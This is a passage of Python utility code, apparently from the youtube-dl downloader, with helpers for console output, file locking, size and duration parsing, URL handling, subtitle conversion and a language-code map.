try:
return next(i for i, c in enumerate(s) if ord(c) > 0xffff)
except StopIteration:
return len(s)
while s:
count = min(next_nonbmp_pos(s), 1024)
ret = WriteConsoleW(
h, s, count if count else 2, ctypes.byref(written), None)
if ret == 0:
raise OSError('Failed to write string')
if not count: # We just wrote a non-BMP character
assert written.value == 2
s = s[1:]
else:
assert written.value > 0
s = s[written.value:]
return True
def write_string(s, out=None, encoding=None):
if out is None:
out = sys.stderr
assert type(s) == compat_str
if sys.platform == 'win32' and encoding is None and hasattr(out, 'fileno'):
if _windows_write_string(s, out):
return
if ('b' in getattr(out, 'mode', '') or
sys.version_info[0] < 3): # Python 2 lies about mode of sys.stderr
byt = s.encode(encoding or preferredencoding(), 'ignore')
out.write(byt)
elif hasattr(out, 'buffer'):
enc = encoding or getattr(out, 'encoding', None) or preferredencoding()
byt = s.encode(enc, 'ignore')
out.buffer.write(byt)
else:
out.write(s)
out.flush()
def bytes_to_intlist(bs):
if not bs:
return []
if isinstance(bs[0], int): # Python 3
return list(bs)
else:
return [ord(c) for c in bs]
def intlist_to_bytes(xs):
if not xs:
return b''
return compat_struct_pack('%dB' % len(xs), *xs)
# Cross-platform file locking
if sys.platform == 'win32':
import ctypes.wintypes
import msvcrt
class OVERLAPPED(ctypes.Structure):
_fields_ = [
('Internal', ctypes.wintypes.LPVOID),
('InternalHigh', ctypes.wintypes.LPVOID),
('Offset', ctypes.wintypes.DWORD),
('OffsetHigh', ctypes.wintypes.DWORD),
('hEvent', ctypes.wintypes.HANDLE),
]
kernel32 = ctypes.windll.kernel32
LockFileEx = kernel32.LockFileEx
LockFileEx.argtypes = [
ctypes.wintypes.HANDLE, # hFile
ctypes.wintypes.DWORD, # dwFlags
ctypes.wintypes.DWORD, # dwReserved
ctypes.wintypes.DWORD, # nNumberOfBytesToLockLow
ctypes.wintypes.DWORD, # nNumberOfBytesToLockHigh
ctypes.POINTER(OVERLAPPED) # Overlapped
]
LockFileEx.restype = ctypes.wintypes.BOOL
UnlockFileEx = kernel32.UnlockFileEx
UnlockFileEx.argtypes = [
ctypes.wintypes.HANDLE, # hFile
ctypes.wintypes.DWORD, # dwReserved
ctypes.wintypes.DWORD, # nNumberOfBytesToLockLow
ctypes.wintypes.DWORD, # nNumberOfBytesToLockHigh
ctypes.POINTER(OVERLAPPED) # Overlapped
]
UnlockFileEx.restype = ctypes.wintypes.BOOL
whole_low = 0xffffffff
whole_high = 0x7fffffff
def _lock_file(f, exclusive):
overlapped = OVERLAPPED()
overlapped.Offset = 0
overlapped.OffsetHigh = 0
overlapped.hEvent = 0
f._lock_file_overlapped_p = ctypes.pointer(overlapped)
handle = msvcrt.get_osfhandle(f.fileno())
if not LockFileEx(handle, 0x2 if exclusive else 0x0, 0,
whole_low, whole_high, f._lock_file_overlapped_p):
raise OSError('Locking file failed: %r' % ctypes.FormatError())
def _unlock_file(f):
assert f._lock_file_overlapped_p
handle = msvcrt.get_osfhandle(f.fileno())
if not UnlockFileEx(handle, 0,
whole_low, whole_high, f._lock_file_overlapped_p):
raise OSError('Unlocking file failed: %r' % ctypes.FormatError())
else:
# Some platforms, such as Jython, is missing fcntl
try:
import fcntl
def _lock_file(f, exclusive):
fcntl.flock(f, fcntl.LOCK_EX if exclusive else fcntl.LOCK_SH)
def _unlock_file(f):
fcntl.flock(f, fcntl.LOCK_UN)
except ImportError:
UNSUPPORTED_MSG = 'file locking is not supported on this platform'
def _lock_file(f, exclusive):
raise IOError(UNSUPPORTED_MSG)
def _unlock_file(f):
raise IOError(UNSUPPORTED_MSG)
class locked_file(object):
def __init__(self, filename, mode, encoding=None):
assert mode in ['r', 'a', 'w']
self.f = io.open(filename, mode, encoding=encoding)
self.mode = mode
def __enter__(self):
exclusive = self.mode != 'r'
try:
_lock_file(self.f, exclusive)
except IOError:
self.f.close()
raise
return self
def __exit__(self, etype, value, traceback):
try:
_unlock_file(self.f)
finally:
self.f.close()
def __iter__(self):
return iter(self.f)
def write(self, *args):
return self.f.write(*args)
def read(self, *args):
return self.f.read(*args)
def get_filesystem_encoding():
encoding = sys.getfilesystemencoding()
return encoding if encoding is not None else 'utf-8'
def shell_quote(args):
quoted_args = []
encoding = get_filesystem_encoding()
for a in args:
if isinstance(a, bytes):
# We may get a filename encoded with 'encodeFilename'
a = a.decode(encoding)
quoted_args.append(pipes.quote(a))
return ' '.join(quoted_args)
def smuggle_url(url, data):
""" Pass additional data in a URL for internal use. """
url, idata = unsmuggle_url(url, {})
data.update(idata)
sdata = compat_urllib_parse_urlencode(
{'__youtubedl_smuggle': json.dumps(data)})
return url + '#' + sdata
def unsmuggle_url(smug_url, default=None):
if '#__youtubedl_smuggle' not in smug_url:
return smug_url, default
url, _, sdata = smug_url.rpartition('#')
jsond = compat_parse_qs(sdata)['__youtubedl_smuggle'][0]
data = json.loads(jsond)
return url, data
def format_bytes(bytes):
if bytes is None:
return 'N/A'
if type(bytes) is str:
bytes = float(bytes)
if bytes == 0.0:
exponent = 0
else:
exponent = int(math.log(bytes, 1024.0))
suffix = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB'][exponent]
converted = float(bytes) / float(1024 ** exponent)
return '%.2f%s' % (converted, suffix)
def lookup_unit_table(unit_table, s):
units_re = '|'.join(re.escape(u) for u in unit_table)
m = re.match(
r'(?P<num>[0-9]+(?:[,.][0-9]*)?)\s*(?P<unit>%s)\b' % units_re, s)
if not m:
return None
num_str = m.group('num').replace(',', '.')
mult = unit_table[m.group('unit')]
return int(float(num_str) * mult)
def parse_filesize(s):
if s is None:
return None
# The lower-case forms are of course incorrect and unofficial,
# but we support those too
_UNIT_TABLE = {
'B': 1,
'b': 1,
'KiB': 1024,
'KB': 1000,
'kB': 1024,
'Kb': 1000,
'MiB': 1024 ** 2,
'MB': 1000 ** 2,
'mB': 1024 ** 2,
'Mb': 1000 ** 2,
'GiB': 1024 ** 3,
'GB': 1000 ** 3,
'gB': 1024 ** 3,
'Gb': 1000 ** 3,
'TiB': 1024 ** 4,
'TB': 1000 ** 4,
'tB': 1024 ** 4,
'Tb': 1000 ** 4,
'PiB': 1024 ** 5,
'PB': 1000 ** 5,
'pB': 1024 ** 5,
'Pb': 1000 ** 5,
'EiB': 1024 ** 6,
'EB': 1000 ** 6,
'eB': 1024 ** 6,
'Eb': 1000 ** 6,
'ZiB': 1024 ** 7,
'ZB': 1000 ** 7,
'zB': 1024 ** 7,
'Zb': 1000 ** 7,
'YiB': 1024 ** 8,
'YB': 1000 ** 8,
'yB': 1024 ** 8,
'Yb': 1000 ** 8,
}
return lookup_unit_table(_UNIT_TABLE, s)
def parse_count(s):
if s is None:
return None
s = s.strip()
if re.match(r'^[\d,.]+$', s):
return str_to_int(s)
_UNIT_TABLE = {
'k': 1000,
'K': 1000,
'm': 1000 ** 2,
'M': 1000 ** 2,
'kk': 1000 ** 2,
'KK': 1000 ** 2,
}
return lookup_unit_table(_UNIT_TABLE, s)
def month_by_name(name):
""" Return the number of a month by (locale-independently) English name """
try:
return ENGLISH_MONTH_NAMES.index(name) + 1
except ValueError:
return None
def month_by_abbreviation(abbrev):
""" Return the number of a month by (locale-independently) English
abbreviations """
try:
return [s[:3] for s in ENGLISH_MONTH_NAMES].index(abbrev) + 1
except ValueError:
return None
def fix_xml_ampersands(xml_str):
"""Replace all the '&' by '&' in XML"""
return re.sub(
r'&(?!amp;|lt;|gt;|apos;|quot;|#x[0-9a-fA-F]{,4};|#[0-9]{,4};)',
'&',
xml_str)
def setproctitle(title):
assert isinstance(title, compat_str)
# ctypes in Jython is not complete
# http://bugs.jython.org/issue2148
if sys.platform.startswith('java'):
return
try:
libc = ctypes.cdll.LoadLibrary('libc.so.6')
except OSError:
return
title_bytes = title.encode('utf-8')
buf = ctypes.create_string_buffer(len(title_bytes))
buf.value = title_bytes
try:
libc.prctl(15, buf, 0, 0, 0)
except AttributeError:
return # Strange libc, just skip this
def remove_start(s, start):
return s[len(start):] if s is not None and s.startswith(start) else s
def remove_end(s, end):
return s[:-len(end)] if s is not None and s.endswith(end) else s
def remove_quotes(s):
if s is None or len(s) < 2:
return s
for quote in ('"', "'", ):
if s[0] == quote and s[-1] == quote:
return s[1:-1]
return s
def url_basename(url):
path = compat_urlparse.urlparse(url).path
return path.strip('/').split('/')[-1]
class HEADRequest(compat_urllib_request.Request):
def get_method(self):
return 'HEAD'
class PUTRequest(compat_urllib_request.Request):
def get_method(self):
return 'PUT'
def int_or_none(v, scale=1, default=None, get_attr=None, invscale=1):
if get_attr:
if v is not None:
v = getattr(v, get_attr, None)
if v == '':
v = None
if v is None:
return default
try:
return int(v) * invscale // scale
except ValueError:
return default
def str_or_none(v, default=None):
return default if v is None else compat_str(v)
def str_to_int(int_str):
""" A more relaxed version of int_or_none """
if int_str is None:
return None
int_str = re.sub(r'[,\.\+]', '', int_str)
return int(int_str)
def float_or_none(v, scale=1, invscale=1, default=None):
if v is None:
return default
try:
return float(v) * invscale / scale
except ValueError:
return default
def strip_or_none(v):
return None if v is None else v.strip()
def parse_duration(s):
if not isinstance(s, compat_basestring):
return None
s = s.strip()
days, hours, mins, secs, ms = [None] * 5
m = re.match(r'(?:(?:(?:(?P<days>[0-9]+):)?(?P<hours>[0-9]+):)?(?P<mins>[0-9]+):)?(?P<secs>[0-9]+)(?P<ms>\.[0-9]+)?$', s)
if m:
days, hours, mins, secs, ms = m.groups()
else:
m = re.match(
r'''(?ix)(?:P?T)?
(?:
(?P<days>[0-9]+)\s*d(?:ays?)?\s*
)?
(?:
(?P<hours>[0-9]+)\s*h(?:ours?)?\s*
)?
(?:
(?P<mins>[0-9]+)\s*m(?:in(?:ute)?s?)?\s*
)?
(?:
(?P<secs>[0-9]+)(?P<ms>\.[0-9]+)?\s*s(?:ec(?:ond)?s?)?\s*
)?$''', s)
if m:
days, hours, mins, secs, ms = m.groups()
else:
m = re.match(r'(?i)(?:(?P<hours>[0-9.]+)\s*(?:hours?)|(?P<mins>[0-9.]+)\s*(?:mins?\.?|minutes?)\s*)$', s)
if m:
hours, mins = m.groups()
else:
return None
duration = 0
if secs:
duration += float(secs)
if mins:
duration += float(mins) * 60
if hours:
duration += float(hours) * 60 * 60
if days:
duration += float(days) * 24 * 60 * 60
if ms:
duration += float(ms)
return duration
def prepend_extension(filename, ext, expected_real_ext=None):
name, real_ext = os.path.splitext(filename)
return (
'{0}.{1}{2}'.format(name, ext, real_ext)
if not expected_real_ext or real_ext[1:] == expected_real_ext
else '{0}.{1}'.format(filename, ext))
def replace_extension(filename, ext, expected_real_ext=None):
name, real_ext = os.path.splitext(filename)
return '{0}.{1}'.format(
name if not expected_real_ext or real_ext[1:] == expected_real_ext else filename,
ext)
def check_executable(exe, args=[]):
""" Checks if the given binary is installed somewhere in PATH, and returns its name.
args can be a list of arguments for a short output (like -version) """
try:
subprocess.Popen([exe] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
except OSError:
return False
return exe
def get_exe_version(exe, args=['--version'],
version_re=None, unrecognized='present'):
""" Returns the version of the specified executable,
or False if the executable is not present """
try:
out, _ = subprocess.Popen(
[encodeArgument(exe)] + args,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate()
except OSError:
return False
if isinstance(out, bytes): # Python 2.x
out = out.decode('ascii', 'ignore')
return detect_exe_version(out, version_re, unrecognized)
def detect_exe_version(output, version_re=None, unrecognized='present'):
assert isinstance(output, compat_str)
if version_re is None:
version_re = r'version\s+([-0-9._a-zA-Z]+)'
m = re.search(version_re, output)
if m:
return m.group(1)
else:
return unrecognized
class PagedList(object):
def __len__(self):
# This is only useful for tests
return len(self.getslice())
class OnDemandPagedList(PagedList):
def __init__(self, pagefunc, pagesize, use_cache=False):
self._pagefunc = pagefunc
self._pagesize = pagesize
self._use_cache = use_cache
if use_cache:
self._cache = {}
def getslice(self, start=0, end=None):
res = []
for pagenum in itertools.count(start // self._pagesize):
firstid = pagenum * self._pagesize
nextfirstid = pagenum * self._pagesize + self._pagesize
if start >= nextfirstid:
continue
page_results = None
if self._use_cache:
page_results = self._cache.get(pagenum)
if page_results is None:
page_results = list(self._pagefunc(pagenum))
if self._use_cache:
self._cache[pagenum] = page_results
startv = (
start % self._pagesize
if firstid <= start < nextfirstid
else 0)
endv = (
((end - 1) % self._pagesize) + 1
if (end is not None and firstid <= end <= nextfirstid)
else None)
if startv != 0 or endv is not None:
page_results = page_results[startv:endv]
res.extend(page_results)
# A little optimization - if current page is not "full", ie. does
# not contain page_size videos then we can assume that this page
# is the last one - there are no more ids on further pages -
# i.e. no need to query again.
if len(page_results) + startv < self._pagesize:
break
# If we got the whole page, but the next page is not interesting,
# break out early as well
if end == nextfirstid:
break
return res
class InAdvancePagedList(PagedList):
def __init__(self, pagefunc, pagecount, pagesize):
self._pagefunc = pagefunc
self._pagecount = pagecount
self._pagesize = pagesize
def getslice(self, start=0, end=None):
res = []
start_page = start // self._pagesize
end_page = (
self._pagecount if end is None else (end // self._pagesize + 1))
skip_elems = start - start_page * self._pagesize
only_more = None if end is None else end - start
for pagenum in range(start_page, end_page):
page = list(self._pagefunc(pagenum))
if skip_elems:
page = page[skip_elems:]
skip_elems = None
if only_more is not None:
if len(page) < only_more:
only_more -= len(page)
else:
page = page[:only_more]
res.extend(page)
break
res.extend(page)
return res
def uppercase_escape(s):
unicode_escape = codecs.getdecoder('unicode_escape')
return re.sub(
r'\\U[0-9a-fA-F]{8}',
lambda m: unicode_escape(m.group(0))[0],
s)
def lowercase_escape(s):
unicode_escape = codecs.getdecoder('unicode_escape')
return re.sub(
r'\\u[0-9a-fA-F]{4}',
lambda m: unicode_escape(m.group(0))[0],
s)
def escape_rfc3986(s):
"""Escape non-ASCII characters as suggested by RFC 3986"""
if sys.version_info < (3, 0) and isinstance(s, compat_str):
s = s.encode('utf-8')
return compat_urllib_parse.quote(s, b"%/;:@&=+$,!~*'()?#[]")
def escape_url(url):
"""Escape URL as suggested by RFC 3986"""
url_parsed = compat_urllib_parse_urlparse(url)
return url_parsed._replace(
netloc=url_parsed.netloc.encode('idna').decode('ascii'),
path=escape_rfc3986(url_parsed.path),
params=escape_rfc3986(url_parsed.params),
query=escape_rfc3986(url_parsed.query),
fragment=escape_rfc3986(url_parsed.fragment)
).geturl()
def read_batch_urls(batch_fd):
def fixup(url):
if not isinstance(url, compat_str):
url = url.decode('utf-8', 'replace')
BOM_UTF8 = '\xef\xbb\xbf'
if url.startswith(BOM_UTF8):
url = url[len(BOM_UTF8):]
url = url.strip()
if url.startswith(('#', ';', ']')):
return False
return url
with contextlib.closing(batch_fd) as fd:
return [url for url in map(fixup, fd) if url]
def urlencode_postdata(*args, **kargs):
return compat_urllib_parse_urlencode(*args, **kargs).encode('ascii')
def update_url_query(url, query):
if not query:
return url
parsed_url = compat_urlparse.urlparse(url)
qs = compat_parse_qs(parsed_url.query)
qs.update(query)
return compat_urlparse.urlunparse(parsed_url._replace(
query=compat_urllib_parse_urlencode(qs, True)))
def update_Request(req, url=None, data=None, headers={}, query={}):
req_headers = req.headers.copy()
req_headers.update(headers)
req_data = data or req.data
req_url = update_url_query(url or req.get_full_url(), query)
req_get_method = req.get_method()
if req_get_method == 'HEAD':
req_type = HEADRequest
elif req_get_method == 'PUT':
req_type = PUTRequest
else:
req_type = compat_urllib_request.Request
new_req = req_type(
req_url, data=req_data, headers=req_headers,
origin_req_host=req.origin_req_host, unverifiable=req.unverifiable)
if hasattr(req, 'timeout'):
new_req.timeout = req.timeout
return new_req
def dict_get(d, key_or_keys, default=None, skip_false_values=True):
if isinstance(key_or_keys, (list, tuple)):
for key in key_or_keys:
if key not in d or d[key] is None or skip_false_values and not d[key]:
continue
return d[key]
return default
return d.get(key_or_keys, default)
def try_get(src, getter, expected_type=None):
try:
v = getter(src)
except (AttributeError, KeyError, TypeError, IndexError):
pass
else:
if expected_type is None or isinstance(v, expected_type):
return v
def encode_compat_str(string, encoding=preferredencoding(), errors='strict'):
return string if isinstance(string, compat_str) else compat_str(string, encoding, errors)
US_RATINGS = {
'G': 0,
'PG': 10,
'PG-13': 13,
'R': 16,
'NC': 18,
}
def parse_age_limit(s):
if s is None:
return None
m = re.match(r'^(?P<age>\d{1,2})\+?$', s)
return int(m.group('age')) if m else US_RATINGS.get(s)
def strip_jsonp(code):
return re.sub(
r'(?s)^[a-zA-Z0-9_.$]+\s*\(\s*(.*)\);?\s*?(?://[^\n]*)*$', r'\1', code)
def js_to_json(code):
def fix_kv(m):
v = m.group(0)
if v in ('true', 'false', 'null'):
return v
elif v.startswith('/*') or v == ',':
return ""
if v[0] in ("'", '"'):
v = re.sub(r'(?s)\\.|"', lambda m: {
'"': '\\"',
"\\'": "'",
'\\\n': '',
'\\x': '\\u00',
}.get(m.group(0), m.group(0)), v[1:-1])
INTEGER_TABLE = (
(r'^0[xX][0-9a-fA-F]+', 16),
(r'^0+[0-7]+', 8),
)
for regex, base in INTEGER_TABLE:
im = re.match(regex, v)
if im:
i = int(im.group(0), base)
return '"%d":' % i if v.endswith(':') else '%d' % i
return '"%s"' % v
return re.sub(r'''(?sx)
"(?:[^"\\]*(?:\\\\|\\['"nurtbfx/\n]))*[^"\\]*"|
'(?:[^'\\]*(?:\\\\|\\['"nurtbfx/\n]))*[^'\\]*'|
/\*.*?\*/|,(?=\s*[\]}])|
[a-zA-Z_][.a-zA-Z_0-9]*|
\b(?:0[xX][0-9a-fA-F]+|0+[0-7]+)(?:\s*:)?|
[0-9]+(?=\s*:)
''', fix_kv, code)
def qualities(quality_ids):
""" Get a numeric quality value out of a list of possible values """
def q(qid):
try:
return quality_ids.index(qid)
except ValueError:
return -1
return q
DEFAULT_OUTTMPL = '%(title)s-%(id)s.%(ext)s'
def limit_length(s, length):
""" Add ellipses to overly long strings """
if s is None:
return None
ELLIPSES = '...'
if len(s) > length:
return s[:length - len(ELLIPSES)] + ELLIPSES
return s
def version_tuple(v):
return tuple(int(e) for e in re.split(r'[-.]', v))
def is_outdated_version(version, limit, assume_new=True):
if not version:
return not assume_new
try:
return version_tuple(version) < version_tuple(limit)
except ValueError:
return not assume_new
def ytdl_is_updateable():
""" Returns if youtube-dl can be updated with -U """
from zipimport import zipimporter
return isinstance(globals().get('__loader__'), zipimporter) or hasattr(sys, 'frozen')
def args_to_str(args):
# Get a short string representation for a subprocess command
return ' '.join(compat_shlex_quote(a) for a in args)
def error_to_compat_str(err):
err_str = str(err)
# On python 2 error byte string must be decoded with proper
# encoding rather than ascii
if sys.version_info[0] < 3:
err_str = err_str.decode(preferredencoding())
return err_str
def mimetype2ext(mt):
if mt is None:
return None
ext = {
'audio/mp4': 'm4a',
# Per RFC 3003, audio/mpeg can be .mp1, .mp2 or .mp3. Here use .mp3 as
# it's the most popular one
'audio/mpeg': 'mp3',
}.get(mt)
if ext is not None:
return ext
_, _, res = mt.rpartition('/')
res = res.lower()
return {
'3gpp': '3gp',
'smptett+xml': 'tt',
'srt': 'srt',
'ttaf+xml': 'dfxp',
'ttml+xml': 'ttml',
'vtt': 'vtt',
'x-flv': 'flv',
'x-mp4-fragmented': 'mp4',
'x-ms-wmv': 'wmv',
'mpegurl': 'm3u8',
'x-mpegurl': 'm3u8',
'vnd.apple.mpegurl': 'm3u8',
'dash+xml': 'mpd',
'f4m': 'f4m',
'f4m+xml': 'f4m',
'hds+xml': 'f4m',
'vnd.ms-sstr+xml': 'ism',
}.get(res, res)
def parse_codecs(codecs_str):
# http://tools.ietf.org/html/rfc6381
if not codecs_str:
return {}
splited_codecs = list(filter(None, map(
lambda str: str.strip(), codecs_str.strip().strip(',').split(','))))
vcodec, acodec = None, None
for full_codec in splited_codecs:
codec = full_codec.split('.')[0]
if codec in ('avc1', 'avc2', 'avc3', 'avc4', 'vp9', 'vp8', 'hev1', 'hev2', 'h263', 'h264', 'mp4v'):
if not vcodec:
vcodec = full_codec
elif codec in ('mp4a', 'opus', 'vorbis', 'mp3', 'aac'):
if not acodec:
acodec = full_codec
else:
write_string('WARNING: Unknown codec %s' % full_codec, sys.stderr)
if not vcodec and not acodec:
if len(splited_codecs) == 2:
return {
'vcodec': vcodec,
'acodec': acodec,
}
elif len(splited_codecs) == 1:
return {
'vcodec': 'none',
'acodec': vcodec,
}
else:
return {
'vcodec': vcodec or 'none',
'acodec': acodec or 'none',
}
return {}
def urlhandle_detect_ext(url_handle):
getheader = url_handle.headers.get
cd = getheader('Content-Disposition')
if cd:
m = re.match(r'attachment;\s*filename="(?P<filename>[^"]+)"', cd)
if m:
e = determine_ext(m.group('filename'), default_ext=None)
if e:
return e
return mimetype2ext(getheader('Content-Type'))
def encode_data_uri(data, mime_type):
return 'data:%s;base64,%s' % (mime_type, base64.b64encode(data).decode('ascii'))
def age_restricted(content_limit, age_limit):
""" Returns True iff the content should be blocked """
if age_limit is None: # No limit set
return False
if content_limit is None:
return False # Content available for everyone
return age_limit < content_limit
def is_html(first_bytes):
""" Detect whether a file contains HTML by examining its first bytes. """
BOMS = [
(b'\xef\xbb\xbf', 'utf-8'),
(b'\x00\x00\xfe\xff', 'utf-32-be'),
(b'\xff\xfe\x00\x00', 'utf-32-le'),
(b'\xff\xfe', 'utf-16-le'),
(b'\xfe\xff', 'utf-16-be'),
]
for bom, enc in BOMS:
if first_bytes.startswith(bom):
s = first_bytes[len(bom):].decode(enc, 'replace')
break
else:
s = first_bytes.decode('utf-8', 'replace')
return re.match(r'^\s*<', s)
def determine_protocol(info_dict):
protocol = info_dict.get('protocol')
if protocol is not None:
return protocol
url = info_dict['url']
if url.startswith('rtmp'):
return 'rtmp'
elif url.startswith('mms'):
return 'mms'
elif url.startswith('rtsp'):
return 'rtsp'
ext = determine_ext(url)
if ext == 'm3u8':
return 'm3u8'
elif ext == 'f4m':
return 'f4m'
return compat_urllib_parse_urlparse(url).scheme
def render_table(header_row, data):
""" Render a list of rows, each as a list of values """
table = [header_row] + data
max_lens = [max(len(compat_str(v)) for v in col) for col in zip(*table)]
format_str = ' '.join('%-' + compat_str(ml + 1) + 's' for ml in max_lens[:-1]) + '%s'
return '\n'.join(format_str % tuple(row) for row in table)
def _match_one(filter_part, dct):
COMPARISON_OPERATORS = {
'<': operator.lt,
'<=': operator.le,
'>': operator.gt,
'>=': operator.ge,
'=': operator.eq,
'!=': operator.ne,
}
operator_rex = re.compile(r'''(?x)\s*
(?P<key>[a-z_]+)
\s*(?P<op>%s)(?P<none_inclusive>\s*\?)?\s*
(?:
(?P<intval>[0-9.]+(?:[kKmMgGtTpPeEzZyY]i?[Bb]?)?)|
(?P<strval>(?![0-9.])[a-z0-9A-Z]*)
)
\s*$
''' % '|'.join(map(re.escape, COMPARISON_OPERATORS.keys())))
m = operator_rex.search(filter_part)
if m:
op = COMPARISON_OPERATORS[m.group('op')]
if m.group('strval') is not None:
if m.group('op') not in ('=', '!='):
raise ValueError(
'Operator %s does not support string values!' % m.group('op'))
comparison_value = m.group('strval')
else:
try:
comparison_value = int(m.group('intval'))
except ValueError:
comparison_value = parse_filesize(m.group('intval'))
if comparison_value is None:
comparison_value = parse_filesize(m.group('intval') + 'B')
if comparison_value is None:
raise ValueError(
'Invalid integer value %r in filter part %r' % (
m.group('intval'), filter_part))
actual_value = dct.get(m.group('key'))
if actual_value is None:
return m.group('none_inclusive')
return op(actual_value, comparison_value)
UNARY_OPERATORS = {
'': lambda v: v is not None,
'!': lambda v: v is None,
}
operator_rex = re.compile(r'''(?x)\s*
(?P<op>%s)\s*(?P<key>[a-z_]+)
\s*$
''' % '|'.join(map(re.escape, UNARY_OPERATORS.keys())))
m = operator_rex.search(filter_part)
if m:
op = UNARY_OPERATORS[m.group('op')]
actual_value = dct.get(m.group('key'))
return op(actual_value)
raise ValueError('Invalid filter part %r' % filter_part)
def match_str(filter_str, dct):
""" Filter a dictionary with a simple string syntax. Returns True (=passes filter) or false """
return all(
_match_one(filter_part, dct) for filter_part in filter_str.split('&'))
def match_filter_func(filter_str):
def _match_func(info_dict):
if match_str(filter_str, info_dict):
return None
else:
video_title = info_dict.get('title', info_dict.get('id', 'video'))
return '%s does not pass filter %s, skipping ..' % (video_title, filter_str)
return _match_func
def parse_dfxp_time_expr(time_expr):
if not time_expr:
return
mobj = re.match(r'^(?P<time_offset>\d+(?:\.\d+)?)s?$', time_expr)
if mobj:
return float(mobj.group('time_offset'))
mobj = re.match(r'^(\d+):(\d\d):(\d\d(?:(?:\.|:)\d+)?)$', time_expr)
if mobj:
return 3600 * int(mobj.group(1)) + 60 * int(mobj.group(2)) + float(mobj.group(3).replace(':', '.'))
def srt_subtitles_timecode(seconds):
return '%02d:%02d:%02d,%03d' % (seconds / 3600, (seconds % 3600) / 60, seconds % 60, (seconds % 1) * 1000)
def dfxp2srt(dfxp_data):
_x = functools.partial(xpath_with_ns, ns_map={
'ttml': 'http://www.w3.org/ns/ttml',
'ttaf1': 'http://www.w3.org/2006/10/ttaf1',
'ttaf1_0604': 'http://www.w3.org/2006/04/ttaf1',
})
class TTMLPElementParser(object):
out = ''
def start(self, tag, attrib):
if tag in (_x('ttml:br'), _x('ttaf1:br'), 'br'):
self.out += '\n'
def end(self, tag):
pass
def data(self, data):
self.out += data
def close(self):
return self.out.strip()
def parse_node(node):
target = TTMLPElementParser()
parser = xml.etree.ElementTree.XMLParser(target=target)
parser.feed(xml.etree.ElementTree.tostring(node))
return parser.close()
dfxp = compat_etree_fromstring(dfxp_data.encode('utf-8'))
out = []
paras = dfxp.findall(_x('.//ttml:p')) or dfxp.findall(_x('.//ttaf1:p')) or dfxp.findall(_x('.//ttaf1_0604:p')) or dfxp.findall('.//p')
if not paras:
raise ValueError('Invalid dfxp/TTML subtitle')
for para, index in zip(paras, itertools.count(1)):
begin_time = parse_dfxp_time_expr(para.attrib.get('begin'))
end_time = parse_dfxp_time_expr(para.attrib.get('end'))
dur = parse_dfxp_time_expr(para.attrib.get('dur'))
if begin_time is None:
continue
if not end_time:
if not dur:
continue
end_time = begin_time + dur
out.append('%d\n%s --> %s\n%s\n\n' % (
index,
srt_subtitles_timecode(begin_time),
srt_subtitles_timecode(end_time),
parse_node(para)))
return ''.join(out)
def cli_option(params, command_option, param):
param = params.get(param)
return [command_option, param] if param is not None else []
def cli_bool_option(params, command_option, param, true_value='true', false_value='false', separator=None):
param = params.get(param)
assert isinstance(param, bool)
if separator:
return [command_option + separator + (true_value if param else false_value)]
return [command_option, true_value if param else false_value]
def cli_valueless_option(params, command_option, param, expected_value=True):
param = params.get(param)
return [command_option] if param == expected_value else []
def cli_configuration_args(params, param, default=[]):
ex_args = params.get(param)
if ex_args is None:
return default
assert isinstance(ex_args, list)
return ex_args
class ISO639Utils(object):
# See http://www.loc.gov/standards/iso639-2/ISO-639-2_utf-8.txt
_lang_map = {
'aa': 'aar',
'ab': 'abk',
'ae': 'ave',
'af': 'afr',
'ak': 'aka',
'am': 'amh',
'an': 'arg',
'ar': 'ara',
'as': 'asm',
'av': 'ava',
'ay': 'aym',
'az': 'aze',
'ba': 'bak',
'be': 'bel',
'bg': 'bul',
'bh': 'bih',
'bi': 'bis',
'bm': 'bam',
'bn': 'ben',
'bo': 'bod',
'br': 'bre',
'bs': 'bos',
'ca': 'cat',
'ce': 'che',
'ch': 'cha',
'co': 'cos',
'cr': 'cre',
'cs': 'ces',
'cu': 'chu',
'cv': 'chv',
'cy': 'cym',
'da': 'dan',
'de': 'deu',
'dv': 'div',
'dz': 'dzo',
'ee': 'ewe',
'el': 'ell',
'en': 'eng',
'eo': 'epo',
'es': 'spa',
'et': 'est',
'eu': 'eus',
'fa': 'fas',
'ff': 'ful',
'fi': 'fin',
'fj': 'fij',
'fo': 'fao',
'fr': 'fra',
'fy': 'fry',
'ga': 'gle',
'gd': 'gla',
'gl': 'glg',
'gn': 'grn',
'gu': 'guj',
'gv': 'glv',
'ha': 'hau',
'he': 'heb',
'hi': 'hin',
'ho': 'hmo',
'hr': 'hrv',
'ht': 'hat',
'hu': 'hun',
'hy': 'hye',
'hz': 'her',
'ia': 'ina',
'id': 'ind',
'ie': 'ile',
'ig': 'ibo',
'ii': 'iii',
'ik': 'ipk',
'io': 'ido',
'is': 'isl',
'it': 'ita',
'iu': 'iku',
'ja': 'jpn',
'jv': 'jav',
'ka': 'kat',
'kg': 'kon',
'ki': 'kik',
'kj': 'kua',
'kk': 'kaz',
'kl': 'kal',
'km': 'khm',
'kn': 'kan',
'ko': 'kor',
'kr': 'kau',
'ks': 'kas',
'ku': 'kur',
'kv': 'kom',
'kw': 'cor',
'ky': 'kir',
'la': 'lat',
'lb': 'ltz',
'lg': 'lug',
'li': 'lim',
'ln': 'lin',
'lo': 'lao',
'lt': 'lit',
'lu': 'lub',
'lv': 'lav',
'mg': 'mlg',
'mh': 'mah',
'mi': 'mri',
'mk': 'mkd',
'ml': 'mal',
'mn': 'mon',
'mr': 'mar',
'ms': 'msa',
'mt': 'mlt',
'my': 'mya',
'na': 'nau',
'nb': 'nob',
'nd': 'nde',
'ne': 'nep',
'ng': 'ndo',
'nl': 'nld',
'nn': 'nno',
'no': 'nor',
'nr': 'nbl',
'nv': 'nav',
'ny': 'nya',
'oc': 'oci',
'oj': 'oji',
'om': 'orm',
'or': 'ori',
'os': 'oss',
'pa': 'pan',
'pi': 'pli',
'pl': 'pol',
'ps': 'pus',
'pt': 'por',
'qu': 'que',
'rm': 'roh',
'rn': 'run',
'ro': 'ron',
'ru': 'rus',
'rw': 'kin',
'sa': 'san',
'sc': 'srd',
'sd': 'snd',
'se': 'sme',
'sg': 'sag',
'si': 'sin',
'sk': 'slk',
'sl': 'slv',
'sm': 'smo',
'sn': 'sna',
'so': 'som',
'sq': 'sqi',
'sr': 'srp',
'ss': 'ssw',
'st': 'sot',
'su': 'sun',
'sv': 'swe',
'sw': 'swa',
